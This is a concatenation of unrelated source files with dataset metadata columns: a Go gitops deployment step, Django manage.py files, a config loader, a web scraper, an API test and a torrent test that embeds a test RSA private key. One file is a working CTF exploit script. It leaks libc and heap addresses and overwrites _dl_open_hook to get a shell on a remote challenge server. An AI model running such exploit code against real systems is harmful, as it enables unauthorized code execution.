For *kustomize* the ` + "`" + `images` + "`" + ` section will be update with the current image.`,
PreRunE: func(cmd *cobra.Command, _ []string) error {
startTime = time.Now()
log.SetStepName(STEP_NAME)
log.SetVerbose(GeneralConfig.Verbose)
GeneralConfig.GitHubAccessTokens = ResolveAccessTokens(GeneralConfig.GitHubTokens)
path, _ := os.Getwd()
fatalHook := &log.FatalHook{CorrelationID: GeneralConfig.CorrelationID, Path: path}
log.RegisterHook(fatalHook)
err := PrepareConfig(cmd, &metadata, STEP_NAME, &stepConfig, config.OpenPiperFile)
if err != nil {
log.SetErrorCategory(log.ErrorConfiguration)
return err
}
log.RegisterSecret(stepConfig.Username)
log.RegisterSecret(stepConfig.Password)
if len(GeneralConfig.HookConfig.SentryConfig.Dsn) > 0 {
sentryHook := log.NewSentryHook(GeneralConfig.HookConfig.SentryConfig.Dsn, GeneralConfig.CorrelationID)
log.RegisterHook(&sentryHook)
}
if len(GeneralConfig.HookConfig.SplunkConfig.Dsn) > 0 {
splunkClient = &splunk.Splunk{}
logCollector = &log.CollectorHook{CorrelationID: GeneralConfig.CorrelationID}
log.RegisterHook(logCollector)
}
validation, err := validation.New(validation.WithJSONNamesForStructFields(), validation.WithPredefinedErrorMessages())
if err != nil {
return err
}
if err = validation.ValidateStruct(stepConfig); err != nil {
log.SetErrorCategory(log.ErrorConfiguration)
return err
}
return nil
},
Run: func(_ *cobra.Command, _ []string) {
stepTelemetryData := telemetry.CustomData{}
stepTelemetryData.ErrorCode = "1"
handler := func() {
config.RemoveVaultSecretFiles()
stepTelemetryData.Duration = fmt.Sprintf("%v", time.Since(startTime).Milliseconds())
stepTelemetryData.ErrorCategory = log.GetErrorCategory().String()
stepTelemetryData.PiperCommitHash = GitCommit
telemetryClient.SetData(&stepTelemetryData)
telemetryClient.Send()
if len(GeneralConfig.HookConfig.SplunkConfig.Dsn) > 0 {
splunkClient.Send(telemetryClient.GetData(), logCollector)
}
}
log.DeferExitHandler(handler)
defer handler()
telemetryClient.Initialize(GeneralConfig.NoTelemetry, STEP_NAME)
if len(GeneralConfig.HookConfig.SplunkConfig.Dsn) > 0 {
splunkClient.Initialize(GeneralConfig.CorrelationID,
GeneralConfig.HookConfig.SplunkConfig.Dsn,
GeneralConfig.HookConfig.SplunkConfig.Token,
GeneralConfig.HookConfig.SplunkConfig.Index,
GeneralConfig.HookConfig.SplunkConfig.SendLogs)
}
gitopsUpdateDeployment(stepConfig, &stepTelemetryData)
stepTelemetryData.ErrorCode = "0"
log.Entry().Info("SUCCESS")
},
}
addGitopsUpdateDeploymentFlags(createGitopsUpdateDeploymentCmd, &stepConfig)
return createGitopsUpdateDeploymentCmd
}
func addGitopsUpdateDeploymentFlags(cmd *cobra.Command, stepConfig *gitopsUpdateDeploymentOptions) {
cmd.Flags().StringVar(&stepConfig.BranchName, "branchName", `master`, "The name of the branch where the changes should get pushed into.")
cmd.Flags().StringVar(&stepConfig.CommitMessage, "commitMessage", os.Getenv("PIPER_commitMessage"), "The commit message of the commit that will be done to do the changes.")
cmd.Flags().StringVar(&stepConfig.ServerURL, "serverUrl", `https://github.com`, "GitHub server url to the repository.")
cmd.Flags().StringVar(&stepConfig.Username, "username", os.Getenv("PIPER_username"), "User name for git authentication")
cmd.Flags().StringVar(&stepConfig.Password, "password", os.Getenv("PIPER_password"), "Password/token for git authentication.")
cmd.Flags().StringVar(&stepConfig.FilePath, "filePath", os.Getenv("PIPER_filePath"), "Relative path in the git repository to the deployment descriptor file that shall be updated. For different tools this has different semantics:\n\n * `kubectl` - path to the `deployment.yaml` that should be patched. Supports globbing.\n * `helm` - path where the helm chart will be generated into. Here no globbing is supported.\n * `kustomize` - path to the `kustomization.yaml`. Supports globbing.\n")
cmd.Flags().StringVar(&stepConfig.ContainerName, "containerName", os.Getenv("PIPER_containerName"), "The name of the container to update")
cmd.Flags().StringVar(&stepConfig.ContainerRegistryURL, "containerRegistryUrl", os.Getenv("PIPER_containerRegistryUrl"), "http(s) url of the Container registry where the image is located")
cmd.Flags().StringVar(&stepConfig.ContainerImageNameTag, "containerImageNameTag", os.Getenv("PIPER_containerImageNameTag"), "Container image name with version tag to annotate in the deployment configuration.")
	cmd.Flags().StringVar(&stepConfig.ChartPath, "chartPath", os.Getenv("PIPER_chartPath"), "Defines the chart path for deployments using helm. Globbing is supported to merge multiple charts into one resource.yaml that will be committed.")
cmd.Flags().StringSliceVar(&stepConfig.HelmValues, "helmValues", []string{}, "List of helm values as YAML file reference or URL (as per helm parameter description for `-f` / `--values`)")
cmd.Flags().StringVar(&stepConfig.DeploymentName, "deploymentName", os.Getenv("PIPER_deploymentName"), "Defines the name of the deployment. In case of `kustomize` this is the name or alias of the image in the `kustomization.yaml`")
cmd.Flags().StringVar(&stepConfig.Tool, "tool", `kubectl`, "Defines the tool which should be used to update the deployment description.")
cmd.MarkFlagRequired("branchName")
cmd.MarkFlagRequired("serverUrl")
cmd.MarkFlagRequired("username")
cmd.MarkFlagRequired("password")
cmd.MarkFlagRequired("filePath")
cmd.MarkFlagRequired("containerRegistryUrl")
cmd.MarkFlagRequired("containerImageNameTag")
cmd.MarkFlagRequired("tool")
}
// retrieve step metadata
func gitopsUpdateDeploymentMetadata() config.StepData {
var theMetaData = config.StepData{
Metadata: config.StepMetadata{
Name: "gitopsUpdateDeployment",
Aliases: []config.Alias{},
Description: "Updates Kubernetes Deployment Manifest in an Infrastructure Git Repository",
},
Spec: config.StepSpec{
Inputs: config.StepInputs{
Secrets: []config.StepSecrets{
{Name: "gitHttpsCredentialsId", Description: "Jenkins 'Username with password' credentials ID containing username/password for http access to your git repository.", Type: "jenkins"},
},
Resources: []config.StepResources{
{Name: "deployDescriptor", Type: "stash"},
},
Parameters: []config.StepParameters{
{
Name: "branchName",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: `master`,
},
{
Name: "commitMessage",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_commitMessage"),
},
{
Name: "serverUrl",
ResourceRef: []config.ResourceReference{},
Scope: []string{"GENERAL", "PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{{Name: "githubServerUrl"}},
Default: `https://github.com`,
},
{
Name: "username",
ResourceRef: []config.ResourceReference{
{
Name: "gitHttpsCredentialsId",
Param: "username",
Type: "secret",
},
{
Name: "gitHttpsCredentialVaultSecretName",
Type: "vaultSecret",
Default: "gitHttpsCredential",
},
},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_username"),
},
{
Name: "password",
ResourceRef: []config.ResourceReference{
{
Name: "gitHttpsCredentialsId",
Param: "password",
Type: "secret",
},
{
Name: "gitHttpsCredentialVaultSecretName",
Type: "vaultSecret",
Default: "gitHttpsCredential",
},
},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_password"),
},
{
Name: "filePath",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_filePath"),
},
{
Name: "containerName",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{},
Default: os.Getenv("PIPER_containerName"),
},
{
Name: "containerRegistryUrl",
ResourceRef: []config.ResourceReference{
{
Name: "commonPipelineEnvironment",
Param: "container/registryUrl",
},
},
Scope: []string{"GENERAL", "PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{{Name: "dockerRegistryUrl"}},
Default: os.Getenv("PIPER_containerRegistryUrl"),
},
{
Name: "containerImageNameTag",
ResourceRef: []config.ResourceReference{
{
Name: "commonPipelineEnvironment",
Param: "container/imageNameTag",
},
},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{{Name: "image", Deprecated: true}, {Name: "containerImage"}},
Default: os.Getenv("PIPER_containerImageNameTag"),
},
{
Name: "chartPath",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{{Name: "helmChartPath"}},
Default: os.Getenv("PIPER_chartPath"),
},
{
Name: "helmValues",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "[]string",
Mandatory: false,
Aliases: []config.Alias{},
Default: []string{},
},
{
Name: "deploymentName",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: false,
Aliases: []config.Alias{{Name: "helmDeploymentName"}},
Default: os.Getenv("PIPER_deploymentName"),
},
{
Name: "tool",
ResourceRef: []config.ResourceReference{},
Scope: []string{"PARAMETERS", "STAGES", "STEPS"},
Type: "string",
Mandatory: true,
Aliases: []config.Alias{},
Default: `kubectl`,
},
},
},
Containers: []config.Container{
{Image: "dtzar/helm-kubectl:3.8.0", WorkingDir: "/config", Options: []config.Option{{Name: "-u", Value: "0"}}, Conditions: []config.Condition{{ConditionRef: "strings-equal", Params: []config.Param{{Name: "tool", Value: "helm"}}}}},
{Image: "dtzar/helm-kubectl:3.8.0", WorkingDir: "/config", Options: []config.Option{{Name: "-u", Value: "0"}}, Conditions: []config.Condition{{ConditionRef: "strings-equal", Params: []config.Param{{Name: "tool", Value: "kubectl"}}}}},
{Image: "nekottyo/kustomize-kubeval:kustomizev4", WorkingDir: "/config", Options: []config.Option{{Name: "-u", Value: "0"}}, Conditions: []config.Condition{{ConditionRef: "strings-equal", Params: []config.Param{{Name: "tool", Value: "kustomize"}}}}},
},
},
}
return theMetaData
}
| [
"\"PIPER_commitMessage\"",
"\"PIPER_username\"",
"\"PIPER_password\"",
"\"PIPER_filePath\"",
"\"PIPER_containerName\"",
"\"PIPER_containerRegistryUrl\"",
"\"PIPER_containerImageNameTag\"",
"\"PIPER_chartPath\"",
"\"PIPER_deploymentName\"",
"\"PIPER_commitMessage\"",
"\"PIPER_username\"",
"\"PIPER_password\"",
"\"PIPER_filePath\"",
"\"PIPER_containerName\"",
"\"PIPER_containerRegistryUrl\"",
"\"PIPER_containerImageNameTag\"",
"\"PIPER_chartPath\"",
"\"PIPER_deploymentName\""
]
| []
| [
"PIPER_deploymentName",
"PIPER_commitMessage",
"PIPER_password",
"PIPER_username",
"PIPER_chartPath",
"PIPER_containerImageNameTag",
"PIPER_containerRegistryUrl",
"PIPER_containerName",
"PIPER_filePath"
]
| [] | ["PIPER_deploymentName", "PIPER_commitMessage", "PIPER_password", "PIPER_username", "PIPER_chartPath", "PIPER_containerImageNameTag", "PIPER_containerRegistryUrl", "PIPER_containerName", "PIPER_filePath"] | go | 9 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "istheweatherweird.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
server/viper.go | package server
import (
"os"
"time"
"github.com/joho/godotenv"
)
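// SetupViper loads variables from an env file chosen by BASEAPI_ENV (".env" by default,
// "../.env.testing" for testing, ".env.prod" for prod), then enables automatic lookup of
// BASEAPI_-prefixed environment variables and applies the default settings.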
func (a *API) SetupViper() error {
filename := ".env"
switch os.Getenv("BASEAPI_ENV") {
case "testing":
filename = "../.env.testing"
case "prod":
filename = ".env.prod"
}
err := godotenv.Overload(filename)
if err != nil {
return err
}
a.Config.SetEnvPrefix("baseapi")
a.Config.AutomaticEnv()
a.SetupViperDefaults()
return nil
}
func (a *API) SetupViperDefaults() {
a.Config.SetDefault("redis_max_idle", 80)
a.Config.SetDefault("redis_max_active", 12000)
a.Config.SetDefault("redis_max_timeout", 240*time.Second)
a.Config.SetDefault("redis_cache_expiration", 10)
a.Config.SetDefault("rate_limit_requests_per_second", 5)
a.Config.SetDefault("rate_limit_activated", true)
}
| [
"\"BASEAPI_ENV\""
]
| []
| [
"BASEAPI_ENV"
]
| [] | ["BASEAPI_ENV"] | go | 1 | 0 | |
scraper/Chocolat_scraper.py | from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException
import os
import re
chromedriver = "/home/mars/Desktop/Chocolate/chromedriver"
os.environ["webdriver.chrome.driver"] = chromedriver
driver = webdriver.Chrome(chromedriver)
actions = ActionChains(driver)
driver.get('http://flavorsofcacao.com/chocolate_database.html')
timeout = 20
try:
WebDriverWait(driver, timeout).until(EC.visibility_of_element_located((By.XPATH, '//*[(@id = "spryregion1")]//table')))
except TimeoutException:
print('Timed out waiting for page to load')
driver.quit()
this_table = driver.find_elements_by_xpath('//*[(@id = "spryregion1")]//table')
text_file = open("data.txt", "w")
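# Write the text of each matched table element to data.txt; the list comprehension is used only for its write() side effects.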
titles = [text_file.write(x.text) for x in this_table]
text_file.close()
| []
| []
| [
"webdriver.chrome.driver"
]
| [] | ["webdriver.chrome.driver"] | python | 1 | 0 | |
manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "vilbert_multitask.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| []
| []
| []
| [] | [] | python | 0 | 0 | |
pwn-urlparse-urlparse2/exploit.py | #!/usr/bin/env python
# coding:utf-8
# Usage: ./exploit.py MODE=remote LOG_LEVEL=warn NOPTRACE NOASLR
from ctf import *
binary = './urlparse'
context.terminal = ['tmux', 'splitw', '-h']
mode = args['MODE'].lower()
code = context.binary = ELF(binary)
if args['LIBDEBUG']:
os.environ['LD_LIBRARY_PATH'] = '/dbg{}/lib'.format(code.bits)
if args['LIBC']:
os.environ['LD_PRELOAD'] = os.path.abspath(args['LIBC'])
libc = code.libc
libc.symbols['main_arena'] = libc.symbols['__malloc_hook'] + 0x10
libc.symbols['one_gadget'] = 0xf1147
def exploit():
if mode == 'remote':
context.noptrace = True
io = remote('47.75.4.252', 10011)
io.recvuntil('sha256(xxxx+')
suffix = io.recvuntil(')', drop=True)
io.recvuntil('== ')
hash_str = io.recvline(keepends=False)
io.sendline(iters.bruteforce(lambda x: sha256sumhex(x + suffix) == hash_str, string.printable[:62], 4, 'fixed'))
elif mode == 'debug':
io = gdb.debug(binary)
io.gdb.c()
else:
io = process(binary)
def create_url(content='', size=None):
assert '\n' not in content
io.sendlineafter('> ', 1)
if size is None:
size = len(content)
        if content[-1:] == '\0':
content = content[:-1]
else:
size += 1
if len(content) + 1 < size:
content += '\n'
io.sendline(size)
if size > 1:
io.send(content)
def encode_url(idx):
io.sendlineafter('> ', 2)
io.sendline(idx)
def decode_url(idx):
io.sendlineafter('> ', 3)
io.sendline(idx)
def list_url(idx=None):
io.sendlineafter('> ', 4)
if idx is not None:
io.recvuntil('{}: '.format(idx))
def delete_url(idx):
io.sendlineafter('> ', 5)
io.sendline(idx)
def encode(x):
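        # Percent-encode raw bytes (or a packed 64-bit integer) as %xx pairs so they survive URL decoding.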
if isinstance(x, int):
x = p64(x)
return '%' + '%'.join(group(2, enhex(x)))
def fill_data(content, size=None):
clip = content.split('\0')
for i in xrange(len(clip), 0, -1):
create_url(' '.join(clip[:i]) + '\0', size)
delete_url(0)
# prepare data for merge
create_url(cyclic(0x8f))
create_url(size=0xffd0)
fill_data(fit({
0x8: 0x10000,
0x10: 0xf0,
}, length=0x30), 0x90)
delete_url(0)
create_url(size=0x100d8) # 0x5555558570a0
create_url(size=0x100) # 0x555555867190
# off by 1
delete_url(1)
encode_url(1)
decode_url(1)
# prepare unsorted bin
create_url(size=0x80)
create_url(size=0x80) # gap
create_url(size=0x400) # 0x5555558571c0
create_url(size=0x80) # gap
create_url(size=0x420) # 0x555555857660
create_url(size=0xf600) # gap
delete_url(5)
# trigger merge
delete_url(5)
# leak address
create_url(size=0x80)
create_url(size=0xa0)
create_url(size=0xa0)
delete_url(1)
list_url(6)
libc.address = unpack(io.recvline(keepends=False), 'all') - libc.symbols['main_arena'] - 0x58
io.recvuntil('7: ')
heap_base = unpack(io.recvline(keepends=False), 'all') - 0x660
info('libc address: %#x', libc.address)
info('heap base address: %#x', heap_base)
delete_url(0)
delete_url(0)
# send 0x411 to large bin (0x5555558571c0)
delete_url(3)
create_url(size=0x440)
delete_url(0)
# use overlap to corrupt previous large bin
fill_data(fit({
0x110: 0x411,
0x120: libc.symbols['_dl_open_hook'] - 0x10,
0x130: libc.symbols['_dl_open_hook'] - 0x20,
}), 0x440)
# send 0x431 to large bin to modify _dl_open_hook (0x555555857660)
delete_url(1)
create_url(size=0x440)
delete_url(0)
# fill value for *_dl_open_hook
create_url(size=0x590)
create_url(fit({0x8: libc.symbols['one_gadget']}), size=0x430)
# trigger
delete_url(4)
io.gdb.attach()
io.gdb.execute('parseheap')
io.gdb.execute('dq 0x555555857000')
io.interactive()
if __name__ == '__main__':
exploit()
| []
| []
| [
"LD_PRELOAD",
"LD_LIBRARY_PATH"
]
| [] | ["LD_PRELOAD", "LD_LIBRARY_PATH"] | python | 2 | 0 | |
tests/scene/test_scene.py | from io import open
import os
import requests
DATA_DIR = os.getenv("TEST_DATA_DIR")
DEEPSTACK_URL = os.getenv("TEST_DEEPSTACK_URL")
API_KEY = os.getenv("TEST_API_KEY")
def test_scene():
image_data = open(os.path.join(DATA_DIR,"scene.jpg"), "rb").read()
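    # Sanity-check that TEST_DEEPSTACK_URL points at the expected local endpoint before calling the API.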
assert DEEPSTACK_URL+"/v1/vision/scene" == "http://localhost:80/v1/vision/scene"
response = requests.post(
DEEPSTACK_URL+"/v1/vision/scene",
files={"image": image_data}, data={"api_key": API_KEY}
)
assert response.status_code == 200
response_json = response.json()
#assert response.status_code == 200, "Request failed with error: {}".format(response_json["error"])
assert response_json["success"] == True
assert response_json["label"] == "conference_room"
| []
| []
| [
"TEST_API_KEY",
"TEST_DEEPSTACK_URL",
"TEST_DATA_DIR"
]
| [] | ["TEST_API_KEY", "TEST_DEEPSTACK_URL", "TEST_DATA_DIR"] | python | 3 | 0 | |
torrent/torrent_int_test.go | // +build ci
// N.B. !! In order for a test in this suite to succeed you must do the following config:
// - set the envvar HORIZON_TEST_DOCKER_CREDFILE_PATH to the location of a docker cred file path (like ~/.docker/config.json)
// - execute this test with docker permissions and a working docker instance
package torrent
import (
"bytes"
"flag"
"fmt"
"github.com/boltdb/bolt"
"github.com/open-horizon/anax/config"
"github.com/open-horizon/anax/events"
"github.com/open-horizon/anax/persistence"
"github.com/open-horizon/rsapss-tool/sign"
"io/ioutil"
"net/http"
"net/url"
"os"
"path"
"strings"
"testing"
"time"
"github.com/stretchr/testify/assert"
)
// using a different key to verify Pkg than deployment
const validPkgSigningCert = `-----BEGIN CERTIFICATE-----
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
-----END CERTIFICATE-----`
// from rsapss-tool, not paired with other keys in this file; using an x509 cert to sign and verify the deployment description
var validTestPrivKey = `-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDAzJUe8MrDpOFu8uJT2rKLo0pic0fksDny6RRszKeRF6uz8ewp
9zTox/ZcLAo7q/XRCos3LMxf7aoXdPY2livwmu7S0CvjcmnxOrZGtH7mwy+Ls5UK
WJ5nPZeZoWogMofQJymgpfXyVABm7AnIuA2hHQjmqFqpxcjFi2RLc6bhawIDAQAB
AoGBAIfIjc14sJURbmOBU7zS7aRCoIStxBhftLBLT0NA71LUZO0amMUFgZHgIrXP
nnVgKoPK9Tkqp9V3wK88hJr1MIPOE3Yi4CgHe8eQ8Q5Z62bb1kUa/yc3nn6MI/Uz
Kn6q7wIYjpSpFQHUNeJZJ3hrU6NfYJbiKVHe0n0ip5WkcjUBAkEA7xWP5cA2Dmra
bze9Thn9Twk+M4UEEEGUUAhkq3QKjTaTi2JTUjd6jue9TKSEcGCNd+rMXsiJ5ucX
EZPCjAphYQJBAM5wrVlybYUqPtBTyfdBsvKlVRpXDPekS0U5HoOHi6pYG8xiLFbG
McooADfvEzv2NTHzwozWJT0fx4Re9wMImksCQHuPezTT55v/4TAFcJKCoAVO05Sw
s+7q1YmfLNfnOuTMReiNQl6FSZO9dHm9tKyXWcWV1VVO8uYgnC17XdoeK0ECQHt4
PuXZn5Few/TbuFbu73Va1zyKxhGzLOW5FPv77Ne0HOQv727y2UKcjAzoK6vYRNac
gUa0qc8WG8Ga/sfMtGMCQQCMWudwltirtK4+U9G1phKiSZcew6O/BlMDM1UjjZQQ
nBKZcF0+H62TmtIIHvRm0wTq+nPPTtoEH8NrNwRZZ2hC
-----END RSA PRIVATE KEY-----`
var validTestDeploymentCert = `-----BEGIN CERTIFICATE-----
MIICHTCCAYagAwIBAgIUYqKtvgqzrCoAUi0aX6WViO/RpOYwDQYJKoZIhvcNAQEL
BQAwOjEeMBwGA1UEChMVUlNBUFNTIFRvb2wgdGVzdCBjZXJ0MRgwFgYDVQQDEw9k
ZXZlbG9wbWVudC1vbmUwHhcNMTcxMjAyMTk1ODMyWhcNMjcxMTMwMDc1ODMyWjA6
MR4wHAYDVQQKExVSU0FQU1MgVG9vbCB0ZXN0IGNlcnQxGDAWBgNVBAMTD2RldmVs
b3BtZW50LW9uZTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwMyVHvDKw6Th
bvLiU9qyi6NKYnNH5LA58ukUbMynkRers/HsKfc06Mf2XCwKO6v10QqLNyzMX+2q
F3T2NpYr8Jru0tAr43Jp8Tq2RrR+5sMvi7OVClieZz2XmaFqIDKH0CcpoKX18lQA
ZuwJyLgNoR0I5qhaqcXIxYtkS3Om4WsCAwEAAaMgMB4wDgYDVR0PAQH/BAQDAgeA
MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADgYEAcs5DAT+frZfJsoSKEMOu
WJh0S/UVYC+InMv9iUnPF3f0KjVBXTE45GDG1zxY6SFLpOVskNp9mMkH9PLqDMrb
kWsF7xOtgBrzIaibDeEhhcQvvHb6Yct1bSgYxWpS1oGKicXA9PFyXxigUW2e8+DH
SoxItJkxfl2adAjY2DVzdhY=
-----END CERTIFICATE-----`
func init() {
flag.Set("logtostderr", "true")
flag.Set("v", "4")
// no need to parse flags, that's done by test framework
}
func tConfig(t *testing.T, dir string) *config.HorizonConfig {
workloadStorageDir := path.Join(dir, "workload_storage")
if err := os.MkdirAll(workloadStorageDir, 0755); err != nil {
panic(err)
}
torrentDir := path.Join(dir, "torrent_dir")
if err := os.MkdirAll(torrentDir, 0755); err != nil {
panic(err)
}
dockerCredFile := os.Getenv("HORIZON_TEST_DOCKER_CREDFILE_PATH")
if dockerCredFile == "" {
